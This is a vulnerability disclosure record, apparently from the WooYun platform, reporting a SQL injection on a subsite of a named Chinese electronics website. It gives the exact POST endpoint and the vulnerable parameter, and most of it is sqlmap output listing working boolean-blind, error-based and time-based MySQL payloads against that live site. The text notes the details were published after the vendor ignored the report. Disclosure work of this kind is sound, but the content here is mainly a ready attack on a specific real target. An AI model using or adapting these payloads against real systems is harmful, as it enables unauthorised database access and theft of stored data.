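2014-10-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-12-06: The vendor has actively ignored the vulnerability; details disclosed to the public.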
High-risk SQL injection at a major Chinese electronics site # full database leak
A subsite is vulnerable to POST injection.
Injection URL: http://seminar.21ic.com:80/vod/byTime (POST)
searchType=CALENDAR&searchName=wYpP&month=1&year=2007&button=%E6%9F%A5%E8%AF%A2

sqlmap identified the following injection points with a total of 857 HTTP(s) requests:
---
Place: POST
Parameter: year
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
Filtering
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 4 (WooYun rating)